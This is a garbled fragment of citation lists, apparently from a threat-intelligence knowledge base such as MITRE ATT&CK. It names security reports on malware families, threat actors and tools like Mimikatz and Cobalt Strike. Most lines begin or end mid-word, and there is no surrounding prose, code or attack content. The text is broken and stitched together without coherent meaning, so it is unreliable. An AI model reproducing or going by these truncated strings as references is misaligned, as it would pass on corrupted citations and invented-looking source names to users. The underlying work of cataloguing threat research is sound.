tation: CISA Iran Albanian Attacks September 2022),(Citation: ESET Grandoreiro April 2020),(Citation: ESET ForSSHe December 2018),(Cita
on: Trend Micro DRBControl February 2020),(Citation: ESET Grandoreiro April 2020),(Citation: Trustwave Pillowmint June 2020),(Citation:
k Basta August 2022),(Citation: ESET T3 Threat Report 2021),(Citation: Trend Micro Black Basta October 2022),
Citation: Cybereason Soft Cell June 2019),(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Trend Micro Waterbear Decem

2021),(Citation: Cybereason Bazar July 2020),(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: NHS Digital Egregor Nov 2
2021),(Citation: Juniper IcedID June 2020),(Citation: Trend Micro Tick November 2019),(Citation: ESET Dukes October 2019),(Citation: Uni
versing run-only applescripts 2021),(Citation: Kandji Cuckoo April 2024),

ember 2022),(Citation: Lunghi Iron Tiger Linux),(Citation: Symantec Palmerworm Sep 2020),(Citation: Bitdefender Sardonic Aug 2021),(Cita
tation: Kaspersky LuminousMoth July 2021),(Citation: Secureworks COBALT DICKENS September 2019),(Citation: Phish Labs Silent Libraria

EV-0537 Mar 2022),(Citation: Recorded Future Turla Infra 2020),(Citation: SentinelLabs Metador Sept 2022),(Citation: CrowdStrike AQUAT
eptember 2022),(Citation: Unit42 Emissary Panda May 2019),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: MSTIC DEV-0537 Mar 20
tion: US District Court Indictment GRU Unit 74455 October 2020),
une 2020),(Citation: Cybereason Cobalt Kitty 2017),(Citation: Palo Alto Office Test Sofacy),(Citation: MRWLabs Office Persistence Add-ins),(
,(Citation: ESET Turla Lunar toolset May 2024),(Citation: win10_asr)
ater November 2017),(Citation: Unit 42 BackConfig May 2020),(Citation: win10_asr),(Citation: MRWLabs Office Persistence Add-ins)
Alto Office Test Sofacy)
tation: win10_asr),(Citation: SensePost Outlook Home Page)
tation: SensePost Outlook Forms),(Citation: win10_asr),(Citation: SensePost Outlook Home Page)
tation: win10_asr),(Citation: SensePost Outlook Home Page)
ation: ESET ComRAT May 2020),(Citation: Savill 1999),(Citation: CrowdStrike BloodHound April 2018),(Citation: Symantec Orangeworm Ap
n Nov 2018),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Trend Micro Qakbot May 2020),(Citation: ESET Machete July 2019),(Cita
,(Citation: IBM IcedID November 2017),(Citation: FireEye Periscope March 2018),(Citation: Cyberreason Anchor December 2019),(Citation
BPO Campaign December 2022),(Citation: AADInternals Documentation),
Citation: ESET ComRAT May 2020),(Citation: McAfee Sodinokibi October 2019),(Citation: Huntress INC Ransom Group August 2023),(Citatio
a January 2021),(Citation: Emissary Trojan Feb 2016),(Citation: ESET ComRAT May 2020),(Citation: GitHub SILENTTRINITY Modules July 201
itation: SOCRadar INC Ransom January 2024),(Citation: Kroll Royal Deep Dive February 2023),(Citation: CISA Royal AA23-061A March 2023
crosoft Moonstone Sleet 2024),(Citation: Mandiant APT43 March 2024),(Citation: Secureworks IRON TWILIGHT Active Measures March 20
d Advisory December 2023),(Citation: ATT Sidewinder January 2021),(Citation: Cyble Sidewinder September 2020),(Citation: Rewterz Side
ts October 2021),(Citation: Secureworks COBALT DICKENS August 2018),(Citation: CISA Star Blizzard Advisory December 2023),(Citation: A

ampaign December 2022),(Citation: MSTIC Octo Tempest Operations October 2023),(Citation: CISA Phishing)
),(Citation: Unit 42 Sofacy Feb 2018),(Citation: TrendMicro Gamaredon April 2020),(Citation: Zdnet Kimsuky Dec 2018),(Citation: Juniper Ic
on: ESET Grandoreiro April 2020),(Citation: ESET EvilNum July 2020),(Citation: Talos Emotet Jan 2019),(Citation: Cybereason Bazar July 202
SA Phishing)
ation: Microsoft Iranian Threat Actor Trends November 2021),(Citation: Google TAG Lazarus Jan 2021),(Citation: MSTIC NOBELIUM May 20
set xcode project 2020),(Citation: Kandji Cuckoo April 2024),(Citation: Apple Developer Doco Hardened Runtime)

ckboot December 2020),(Citation: FireEye APT41 Aug 2019),(Citation: ESET Sednit Part 3),(Citation: Cybereason WhisperGate February 202

tation: Cisco IOS Software Integrity Assurance - Secure Boot),(Citation: Cisco IOS Software Integrity Assurance - Image File Verification),(Cit
Hacking Team UEFI),(Citation: ESET LoJax Sept 2018),(Citation: Intel Hardware-based Security Technologies),(Citation: TCG Trusted Platform
tation: Cisco IOS Software Integrity Assurance - AAA),(Citation: Cisco IOS Software Integrity Assurance - Secure Boot),(Citation: Cisco IOS So
alware July 2020),(Citation: MSTIC FoggyWeb September 2021),(Citation: CISA AR21-126A FIVEHANDS May 2021),(Citation: Check Point W
ation: Unit42 Emissary Panda May 2019),(Citation: GitHub Sliver C2),(Citation: Cyble Egregor Oct 2020),(Citation: Trend Micro Tick Novemb
bee April 2022),(Citation: IBM IcedID November 2017),(Citation: Trustwave Pillowmint June 2020),(Citation: Prevx Carberp March 2011),(C
019),(Citation: CrowdStrike Putter Panda),(Citation: Symantec Darkmoon Aug 2005),(Citation: GitHub PowerSploit May 2012),(Citation: Tre
Gapz and Redyms Mar 2013),(Citation: ESET Recon Snake Nest),

8),(Citation: Zscaler Pikabot 2023),(Citation: GDATA Zeus Panda June 2017),(Citation: Google Cloud APT41 2024),(Citation: ESET GreyEnerg

Leafminer July 2018),(Citation: NCC Group Team9 June 2020),(Citation: Kaspersky Lab SynAck May 2018),(Citation: Cybereason Bazar July
Wipers January 2022),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: FireEye Ursnif Nov 2017),(Citation: Talos Lok

ear December 2019),(Citation: ESET Gazer Aug 2017),(Citation: Elastic Pikabot 2024),(Citation: Securelist WhiteBear Aug 2017),
15),(Citation: FireEye Ursnif Nov 2017),

rm-Ukraine-2022),(Citation: NCC Group Chimera January 2021),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Crowdstrike TELCO BP
FRAME June 2018),(Citation: BitDefender BADHATCH Mar 2021),(Citation: Zdnet Ngrok September 2018),(Citation: ESET Turla Lunar toolse
2021),(Citation: Mythc Documentation),(Citation: Cobalt Strike Manual 4.3 November 2020),
),(Citation: NCSC et al APT29 2024),(Citation: Cybereason Soft Cell June 2019),(Citation: Trend Micro Muddy Water March 2021),(Citation:
,(Citation: Kaspersky ProjectSauron Blog),(Citation: ClearkSky Fox Kitten February 2020),(Citation: Accenture HyperStack October 2020),(Ci
Pity June 2020),(Citation: ORB Mandiant),(Citation: NKAbuse BC),(Citation: NCSC CISA Cyclops Blink Advisory February 2022),(Citation: Sym
nging May 2018),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Cybereason Bazar July 2020),(Citation: Cisco Talos Bitter Banglade
ation: GitHub PowerSploit May 2012),(Citation: Gigamon BADHATCH Jul 2019),(Citation: Talos Lokibot Jan 2021),(Citation: Qualys LolZarus
SIDENT December 2019),(Citation: SOCRadar INC Ransom January 2024),(Citation: ESET Trickbot Oct 2020),(Citation: ESET EvilNum July 202
dows RDP Sessions)

ovel threat actor),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: TrendMicro BlackTech June 2017),(Citatio
SA Scattered Spider Advisory November 2023),(Citation: Mandiant Remediation and Hardening Strategies for Microsoft 365),(Citation: Prot

erShell Empire),(Citation: Cobalt Strike DCOM Jan 2017),(Citation: Microsoft COM ACL),(Citation: Microsoft System Wide Com Keys),(Citatio
INC Ransom January 2024),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Huntress INC Ransom Group August 2023),(Citation: FireEye A
BlackEnergy Nov 2014),(Citation: NCC Group Chimera January 2021),(Citation: Dark Vortex Brute Ratel C4),(Citation: Sygnia Elephant Beet
23),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Aqua Kinsing April 2020),(Citation: Github PowerShell Empire),(Citation: Volexity Ivanti
nit 42 Gamaredon February 2022),(Citation: Palo Alto Latrodectus Activity June 2024),(Citation: Check Point Warzone Feb 2020),(Citation:
al 4.3 November 2020),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Symantec RAINDROP January 2021),(Citation: GitHub SILENTT
m April 2018),(Citation: Cybereason Bazar July 2020),(Citation: AlienVault Sykipot 2011),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citatio
n: FBI Flash FIN7 USB),(Citation: Trend Micro Conficker),(Citation: Cisco H1N1 Part 2),(Citation: Secureworks IRON TWILIGHT Active Measu

Citation: Unit 42 Rocke January 2019),(Citation: Unit 42 Hildegard Malware),(Citation: ESET ForSSHe December 2018),(Citation: FireEye AP

on: Symantec Darkmoon Aug 2005),(Citation: Chronicle Winnti for Linux May 2019),(Citation: NSA/FBI Drovorub August 2020),(Citation: U
o EarthLusca 2022),(Citation: Mandiant APT41),(Citation: Talos Lokibot Jan 2021),(Citation: Cybereason StrifeWater Feb 2022),(Citation: T
tion: FireEye Periscope March 2018),(Citation: Dell Lateral Movement),(Citation: TechNet At),(Citation: CME Github September 2018),(Cita

n: Unit 42 Rocke January 2019),(Citation: Janicab),(Citation: NKAbuse SL),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Tal
e-2022),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Cybereason Bazar July

017),(Citation: NTT Security Flagpro new December 2021),(Citation: Kaspersky ToddyCat June 2022),(Citation: Symantec Linfo May 2012),(
June 2017),(Citation: Trend Micro Tick November 2019),(Citation: Talos Agent Tesla Oct 2018),(Citation: PWC KeyBoys Feb 2017),(Citation

ation: CISA AA24-038A PRC Critical Infrastructure February 2024),

tion: US District Court Indictment GRU Unit 74455 October 2020),(Citation: CISA Star Blizzard Advisory December 2023),(Citation: Microsoft

21),(Citation: Google EXOTIC LILY March 2022),

24),(Citation: KISA Operation Muzabi),(Citation: Phish Labs Silent Librarian),(Citation: Google Cloud APT41 2024),(Citation: US District Cour
yndicate Disabling PHP functions),(Citation: Microsoft System Services Fundamentals)
1),(Citation: Dell TG-3390),(Citation: McAfee Lazarus Jul 2020),(Citation: Unit 42 RGDoor Jan 2018),(Citation: Microsoft ISAPICGIRestriction
urchu, Eric Chien February 2011),

banian Attacks September 2022),(Citation: ESET Exchange Mar 2021),(Citation: Mandiant-Sandworm-Ukraine-2022),(Citation: Mandiant AP
s Conditional Access),(Citation: Google Workspace Apps Script Restrict OAuth Scopes)
Locker June 2020),(Citation: CarbonBlack RobbinHood May 2019),(Citation: Dragos EKANS),(Citation: Intel 471 REvil March 2020),(Citation:
al April 2019),(Citation: Lumen Versa 2024),(Citation: MSTIC FoggyWeb September 2021),(Citation: CyberBit Dtrack),(Citation: ESET Attor O
alos Avos Jun 2022),(Citation: Dell TG-1314),(Citation: Group IB Silence Sept 2018),(Citation: Microsoft Prestige ransomware October 2022
ember 2018),(Citation: FireEye Metamorfo Apr 2018),(Citation: ATT Sidewinder January 2021),(Citation: ESET ComRAT May 2020),(Citation
2017),(Citation: Trend Micro Tick November 2019),(Citation: Cybereason Bazar July 2020),(Citation: Cisco Talos Bitter Bangladesh May 202

ation: PWC Yellow Liderc 2023),(Citation: Gigamon Berserk Bear October 2021),(Citation: Mandiant FIN7 Apr 2022),(Citation: SentinelOne

ALT DICKENS September 2019),(Citation: Malwarebytes Silent Librarian October 2020),(Citation: Proofpoint TA407 September 2019),

mTNT May 2021),(Citation: SentinelOne SocGholish Infrastructure November 2022),(Citation: Microsoft Moonstone Sleet 2024),(Citation:
(Citation: Dell TG-3390),
n: Trend Micro Pawn Storm OAuth 2017),(Citation: NCSC et al APT29 2024),(Citation: Kubernetes Hardening Guide)
er Jan 2019),(Citation: IBM Grandoreiro April 2020),(Citation: CISA Scattered Spider Advisory November 2023),(Citation: CISA Star Blizzard
(Citation: Adsecurity Mimikatz Guide),(Citation: SpecterOps Certified Pre Owned),(Citation: GitHub PSPKIAudit),(Citation: GitHub Certify)
015),(Citation: Brining MimiKatz to Unix)
ch 2023),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: AdSecurity Cracking Kerberos Dec 2015),(Citation: Microsoft Pr
on: Brining MimiKatz to Unix),(Citation: audits linikatz)
arch 2023),(Citation: GitHub Mimikatz kerberos Module),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Github PowerShell
ation: Mandiant_UNC2165),(Citation: Mandiant FIN7 Apr 2022),(Citation: PowerSploit Invoke Kerberoast),(Citation: Mandiant FIN12 Oct 2
Empire),(Citation: AADInternals Documentation),(Citation: GitHub Rubeus March 2023),(Citation: AdSecurity Cracking Kerberos Dec 2015)
itation: Wikipedia HPKP)
ber 2022),(Citation: ESET Hermetic Wiper February 2022),(Citation: FireEye FIN7 Aug 2018),(Citation: Bitdefender StrongPity June 2020),(C
it Part 2),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Unit42 AcidBox June 2020),(Citation: GitHub Turla Driver Loader),(Citation
Spy Jan 2022),(Citation: Kandji Cuckoo April 2024),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: Application Bundle
x.dok analysis 2019),(Citation: ESET RTM Feb 2017),(Citation: Unit42 Redaman January 2019),(Citation: objsee mac malware 2017),(Citatio
505 Aug 2019),(Citation: ESET T3 Threat Report 2021),(Citation: Korean FSI TA505 2020),(Citation: Dormann Dangers of VHD 2019),(Citatio

d emerges as novel threat actor),(Citation: S2W Racoon 2022),(Citation: Cider Security Top 10 CICD Security Risks),(Citation: OWASP Top 1

op 10 CICD Security Risks),(Citation: OWASP Top 10)

2017),(Citation: Avast CCleaner3 2018),(Citation: Microsoft Moonstone Sleet 2024),(Citation: Microsoft Deep Dive Solorigate January 2021)
l Infrastructure February 2024),(Citation: Qualys LolZarus),
Oct 2018),(Citation: FireEye MuddyWater Mar 2018),(Citation: Mandiant ROADSWEEP August 2022),(Citation: Unit 42 Cobalt Gang Oct 201
B Silence Aug 2019),(Citation: FireEye APT41 Aug 2019),(Citation: Cofense Astaroth Sept 2018),(Citation: SecureList Silence Nov 2017),(Cita
,(Citation: Windows Commands JPCERT),(Citation: NSA MS AppLocker),(Citation: Beechey 2010),(Citation: Microsoft Windows Defender A

Covenant),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Cybereason Chaes
2019),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: FireEye Metamorfo Apr 2018),(Citation: FireEye MuddyWater
Trend Micro Muddy Water March 2021),(Citation: Deep Instinct TA505 Apr 2019),(Citation: SCILabs Malteiro 2021),(Citation: Securelist Bra
berryRobin 2022),(Citation: TrendMicro Cobalt Group Nov 2017),

Water February 2022),(Citation: ESET EvilNum July 2020),(Citation: ESET OceanLotus Mar 2019),(Citation: Deep Instinct Black Basta Augus
Citation: Dell Sakula),(Citation: Symantec Orangeworm April 2018),(Citation: Cylance Shell Crew Feb 2017),(Citation: F-Secure CozyDuke),(C

),(Citation: TrendMicro Gamaredon April 2020),(Citation: Malwarebytes Saint Bot April 2021),(Citation: Unit 42 KerrDown February 2019),(
itation: SentinelOne Gootloader June 2021),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Kandji Cuckoo April 20
p Team9 June 2020),(Citation: SCILabs Malteiro 2021),(Citation: McAfee Maze March 2020),(Citation: Kaspersky Sodin July 2019),(Citation
18),(Citation: Forcepoint Felismus Mar 2017),(Citation: Emissary Trojan Feb 2016),(Citation: ESET Grandoreiro April 2020),(Citation: Symant
(Citation: Kaspersky Lyceum October 2021),(Citation: Bitdefender Sardonic Aug 2021),(Citation: Microsoft Actinium February 2022),(Citatio
T35 CharmPower January 2022),(Citation: Malwarebytes Agent Tesla April 2020),
2011),(Citation: CME Github September 2018),(Citation: NHS Digital Egregor Nov 2020),(Citation: McAfee Maze March 2020),(Citation: Sec
nging May 2018),(Citation: ESET ForSSHe December 2018),(Citation: Forcepoint Felismus Mar 2017),(Citation: ESET Grandoreiro April 2020

rosoft_rec_block_rules)

WastedLocker June 2020),(Citation: FireEye APT37 Feb 2018),(Citation: NCC Group Chimera January 2021),(Citation: Emissary Trojan Feb

(Citation: Securelist Calisto July 2018),(Citation: CISA AppleJeus Feb 2021),(Citation: SentinelLabs reversing run-only applescripts 2021),(Cit
2020),(Citation: NCC Group Chimera January 2021),(Citation: Microsoft Wingbird Nov 2017),(Citation: Unit42 Emissary Panda May 2019),(C
Citation: Talos Nyetya June 2017),(Citation: Unit 42 Shamoon3 2018),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Trend M
April 2020),(Citation: Cybereason Bazar July 2020),(Citation: Trend Micro Tick November 2019),(Citation: JoeSecurity Egregor 2020),(Citatio
TLER Oct 2017),(Citation: Microsoft Ransomware as a Service),(Citation: Cisco H1N1 Part 2),(Citation: Nicolas Falliere, Liam O Murchu, Eric
v 2016),(Citation: Unit 42 Gamaredon February 2022),(Citation: Secureworks IRON TILDEN Profile),(Citation: Proofpoint RTF Injection),(Cita
on: Mandiant Cutting Edge January 2024),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Mandiant Cutting Edge Part 3 February 202
or Sept 2022),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),
art 3 February 2024),(Citation: Sandfly BPFDoor 2022),(Citation: Leonardo Turla Penquin May 2020),
4),(Citation: group-ib_redcurl2),(Citation: Microsoft Purview Data Loss Prevention),(Citation: Google Workspace External Sharing),(Citation

enticode),(Citation: Microsoft Learn ClickOnce Config)

17),(Citation: Github PowerShell Empire),(Citation: Microsoft WDAC)
Hopper Technical Annex April 2017),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: Secureworks REvil September 2019),(Ci
son Astaroth Feb 2019),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Huntress NPPSPY 2022),(Citation: Re

are),(Citation: Peirates GitHub),(Citation: Trend Micro TeamTNT),(Citation: RedLock Instance Metadata API 2018),(Citation: Amazon AWS
n: Docker Daemon Socket Protect),(Citation: Kubernetes RBAC),(Citation: Kubernetes API Control Access),(Citation: Kubernetes Service Acc
(Citation: Securelist BlackEnergy Nov 2014),(Citation: Cado Security TeamTNT Worm August 2020),(Citation: CrowdStrike Putter Panda),(C
esla Aug 2020),(Citation: group-ib_redcurl2),(Citation: Pentestlab Stored Credentials),(Citation: TrendMicro Trickbot Feb 2019),(Citation: Cy
12),(Citation: FireEye APT33 Guardrail),(Citation: Mandiant FIN12 Oct 2021),(Citation: PowerSploit Documentation),(Citation: GitHub SILEN
degard Malware),(Citation: CISA Scattered Spider Advisory November 2023),(Citation: ESET Ebury Feb 2014),(Citation: Trend Micro TeamTN

RITUAL Profile),(Citation: MSTIC FoggyWeb September 2021),(Citation: Microsoft Token Protection 2023),(Citation: Okta DPoP 2023)
LONIUM June 2022),(Citation: Trend Micro Pawn Storm OAuth 2017),(Citation: Peirates GitHub),(Citation: Microsoft Token Protection 202
a January 2021),(Citation: Cybereason Soft Cell June 2019),(Citation: Mandiant APT1),(Citation: Cybereason Cobalt Kitty 2017),(Citation: CM
ols),(Citation: Harmj0y DCSync Sept 2015),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Symantec Seaduke 2015),(Citation:
zard Advisory December 2023),(Citation: Volexity SolarWinds),
,(Citation: CISA Scattered Spider Advisory November 2023),(Citation: Microsoft RaspberryRobin 2022),(Citation: win10_asr)
a Spotlight September 2022),(Citation: Unit 42 Sofacy Feb 2018),(Citation: TrendMicro Gamaredon April 2020),(Citation: Deep Instinct Bla
),(Citation: Content trust in Azure Container Registry)
2020),(Citation: ESET EvilNum July 2020),(Citation: Cybereason Bazar July 2020),(Citation: Securelist Brazilian Banking Malware July 2020)
V-0537 Mar 2022),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Kaspersky Carbanak),(Citation: Cybersecurity Advisory SVR TTP M
e Secure Update May 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Mandiant APT29 Eye Spy Email Nov 22),(Citation
on: DFIR Phosphorus November 2021),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Sygnia Elephant Bee
2018),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Microsoft Prestige ransomware October 2022),(Citation: ESET Duke
2 May 2017),(Citation: US-CERT NotPetya 2017),(Citation: Umbreon Trend Micro),(Citation: NCSC et al APT29 2024),(Citation: Microsoft Ra
2020),(Citation: Cylance Shaheen Nov 2018),(Citation: FireEye FIN7 Aug 2018),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: DOJ FIN7 Au
ation: Cyble Egregor Oct 2020),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Malwarebytes Agent Tesla April 2020),(Citation: Cybere
ndoreiro April 2020),(Citation: Trend Micro Qakbot May 2020),(Citation: Talos Group123),(Citation: ESET EvilNum July 2020),(Citation: Goo
trol February 2020),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Accenture MUDCARP March 2019),(Citation: Talos Lokibot Jan
on: Unit42 Molerat Mar 2020),(Citation: Lastline DarkHotel Just In Time Decryption Nov 2015),

Malware),(Citation: Zdnet Ngrok September 2018),(Citation: Mandiant APT41),(Citation: Cisco Ukraine Wipers January 2022),(Citation: Micr
orm Dec 2020),(Citation: Forcepoint Carbanak Google C2),(Citation: Trend Micro DRBControl February 2020),(Citation: ESET Grandoreiro A
(Citation: Securelist Brazilian Banking Malware July 2020),(Citation: ESET Casbaneiro Oct 2019),(Citation: ESET Dukes October 2019),(Citati
n: FireEye Metamorfo Apr 2018),(Citation: Prevailion EvilNum May 2020),(Citation: unit42_gamaredon_dec2022),(Citation: Medium Metam
17),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: Cybereason Bazar July 2020),(Citation: CME Github September 2018),(Citation: M
),(Citation: Talos Cobalt Group July 2018),(Citation: PTSecurity Higaisa 2020),
kula),(Citation: Cisco H1N1 Part 2),(Citation: ESET EvilNum July 2020),(Citation: Talos Lokibot Jan 2021),(Citation: Trend Micro Tick Novemb

(Citation: CrowdStrike SUNSPOT Implant January 2021),(Citation: Kaspersky Duqu 2.0),(Citation: ESET Gelsemium June 2021),(Citation: Git
PowerShell May 2019),(Citation: Unit42 Azorult Nov 2018),(Citation: Novetta Blockbuster),(Citation: CheckPoint Naikon May 2020),(Citation
Microsoft runas),(Citation: Microsoft Create Token),(Citation: Microsoft Replace Process Token)
rellix Darkgate 2023),
Microsoft SID Filtering Quarantining Jan 2009),(Citation: AdSecurity Kerberos GT Aug 2015),(Citation: Microsoft Netdom Trust Sept 2012)
nit 42 Siloscape Jun 2021),(Citation: ESET Okrum July 2019),(Citation: Binary Defense Emotes Wi-Fi Spreader),(Citation: cobaltstrike manua
erGoga 2019),(Citation: SentinelOne Agrius 2021),(Citation: IBM MegaCortex),
code project 2020),(Citation: Crowdstrike HuntReport 2022),(Citation: UCF STIG Elevation Account Enumeration)

ddy Water March 2021),(Citation: Sygnia Elephant Beetle Jan 2022),(Citation: MSTIC DEV-0537 Mar 2022),(Citation: Google Cloud APT41 2
Post Ruler GitHub),(Citation: CIS Emotet Dec 2018),(Citation: IBM IcedID November 2017),(Citation: Black Hills Attacking Exchange MailSni
ar 2018),(Citation: Google Cloud APT41 2024),(Citation: NCC Group Team9 June 2020),(Citation: Symantec Orangeworm April 2018),(Citati
n: Dragos Crashoverride 2018),(Citation: Metcalf 2015),(Citation: Adsecurity Mimikatz Guide),
Recent Nation-State Cyber Attacks),(Citation: Expel IO Evil in AWS),(Citation: Crowdstrike AWS User Federation Persistence)
t Operations October 2023),(Citation: Microsoft Requests for Azure AD Roles in Privileged Identity Management)

nds),(Citation: FireEye APT35 2018),(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks),(Citation: Mandiant A
Citation: KISA Operation Muzabi),(Citation: Microsoft Net Localgroup),(Citation: Ensilo Darkgate 2018),(Citation: Sygnia Elephant Beetle Ja
diant APT29 Microsoft 365 2022),(Citation: Microsoft - Device Registration),(Citation: CISA MFA PrintNightmare),(Citation: Mandiant APT2
xcode project 2020),(Citation: Cisco Talos Intelligence Group),

itation: SentinelOne Agrius 2021),

orks BRONZE PRESIDENT December 2019),(Citation: Accenture MUDCARP March 2019),(Citation: Mandiant APT1),(Citation: Microsoft Mo

ISA Operation Muzabi),(Citation: Microsoft GALLIUM December 2019),(Citation: SentinelOne SocGholish Infrastructure November 2022),(C

e WinterVivern 2023),(Citation: Microsoft Moonstone Sleet 2024),(Citation: Leonard TAG 2023),(Citation: MSTIC DEV-0537 Mar 2022),(Cita
BELIUM May 2021),(Citation: ESET Crutch December 2020),(Citation: TrendMicro Confucius APT Feb 2018),(Citation: Anomali Static Kitten F

sca 2022),(Citation: Trend Micro TeamTNT),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: TrendMicro Pawn Storm 2019),(Citatio
e),(Citation: GitHub Responder),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Secure Ideas SMB Relay),(Citation: ADSec
nit 42 Hildegard Malware),(Citation: Trend Micro TeamTNT),(Citation: RedCanary RaspberryRobin 2022),(Citation: Mandiant APT29 Eye Spy
uary 2022),(Citation: FireEye FIN7 Aug 2018),(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: PTSecurity Cobalt Dec 201
uky October 2019),(Citation: ESET Machete July 2019),(Citation: Unit 42 CARROTBAT January 2020),(Citation: Unit42 SilverTerrier 2018),(Ci
),(Citation: Bitdefender Agent Tesla April 2020),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Cofense Agent Tesla),(Citation: ESE

C WellMess July 2020),(Citation: S2 Grupo TrickBot June 2017),(Citation: Medium Metamorfo Apr 2020),(Citation: cobaltstrike manual),(Ci
tamorfo Apr 2018),(Citation: Symantec Darkmoon Aug 2005),(Citation: ESET Machete July 2019),(Citation: Google Cloud APT41 2024),(Cita
Oct 2020),(Citation: ESET OceanLotus Mar 2019),(Citation: Novetta Blockbuster Loaders),(Citation: Talos Agent Tesla Oct 2018),(Citation: M
2021),(Citation: Novetta Blockbuster Loaders),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: McAfee Lazarus Resurfaces Feb 2018)
MacOS Backdoor November 2020),(Citation: Accenture MUDCARP March 2019),(Citation: Novetta Blockbuster RATs),(Citation: Securelist D
1),(Citation: ESET Crutch December 2020),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Symantec Calisto July 2018),(Cita
n APT-C-36 Feb2019),(Citation: Kaspersky TajMahal April 2019),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Syman
018),(Citation: objective-see windtail2 jan 2019),(Citation: Mandiant APT1),(Citation: Bitdefender StrongPity June 2020),(Citation: Google C
TajMahal April 2019),(Citation: S2W Racoon 2022),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: ESET Crutch Dec

: PaloAlto UBoatRAT Nov 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Mandiant FIN12 Oct 2021),(Citation: Group

kit Main),(Citation: Apple TN2459 Kernel Extensions),(Citation: Kernel.org Restrict Kernel Module),(Citation: Increasing Linux kernel integri
e Cred Guard April 2017),(Citation: Microsoft Credential Guard April 2017),(Citation: Microsoft DLL Security)
January 2020),

Citation: TrendMicro Gamaredon April 2020),(Citation: Dell Sakula),(Citation: ESET EvilNum July 2020),(Citation: Malwarebytes Saint Bot A
crosoft Configure LSA)
Resurfaces Feb 2018),(Citation: Cylance Cleaver),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: IBM Grandoreiro Apr

n Nov 2018),(Citation: Zscaler Bazar September 2020),(Citation: Secureworks DarkTortilla Aug 2022),(Citation: TrendMicro Tropic Trooper M

ation: Unit 42 Playbook Dec 2017),(Citation: Cybereason Kimsuky November 2020),

mbert for OSX Oct 2021),(Citation: Intezer HiddenWasp Map 2019),(Citation: objsee mac malware 2017),

n: Netscout Stolen Pencil Dec 2018),(Citation: MacKeeper Bundlore Apr 2019),(Citation: Intego Shlayer Apr 2018),(Citation: Technospot Ch
tion: Securelist Calisto July 2018),(Citation: SCILabs Malteiro 2021),(Citation: SentinelLabs Metador Sept 2022),(Citation: Threatpost Lizar M
tation: Microsoft Totbrick Oct 2017),(Citation: Trusteer Carberp October 2010),(Citation: IBM Grandoreiro April 2020),(Citation: Fidelis Tric
2016),(Citation: CME Github September 2018),(Citation: ESET Lazarus Jun 2020),(Citation: Dragos Crashoverride 2018),(Citation: Aqua Kins
osoft Common Conditional Access Policies),(Citation: NIST 800-63-3)
n Plan),(Citation: NIST 800-63-3)
ard March 2022),(Citation: Unit42 Xbash Sept 2018),(Citation: Unit 42 Lucifer June 2020),(Citation: CheckPoint SpeakUp Feb 2019),(Citation
r 2018),(Citation: Anomali Linux Rabbit 2018),(Citation: FireEye APT33 Guardrail),(Citation: Microsoft STRONTIUM New Patterns Cred Harv

n: GDATA Zeus Panda June 2017),(Citation: Symantec Chafer February 2018),(Citation: Securelist Brazilian Banking Malware July 2020),(Cita

016),(Citation: FireEye FIN7 Aug 2018),(Citation: QiAnXin APT-C-36 Feb2019),(Citation: GDATA Zeus Panda June 2017),(Citation: Cybereason
tation: MacKeeper Bundlore Apr 2019),(Citation: objsee mac malware 2017),(Citation: applescript signing)
Darkgate 2018),

ndiant APT41),(Citation: ATT Sidewinder January 2021),(Citation: Cofense Astaroth Sept 2018),(Citation: DHS CISA AA22-055A MuddyWate

tation: EST Kimsuky April 2019),(Citation: Trend Micro Black Basta Spotlight September 2022),(Citation: Picus Emotet Dec 2018),(Citation: C
November 2019),(Citation: CitizenLab KeyBoy Nov 2016),(Citation: Cybereason Molerats Dec 2020),(Citation: Microsoft Ransomware as a S
one apt32 macOS backdoor 2020),(Citation: NSA/FBI Drovorub August 2020),(Citation: ESET Kobalos Feb 2021),(Citation: ESET DazzleSpy Ja
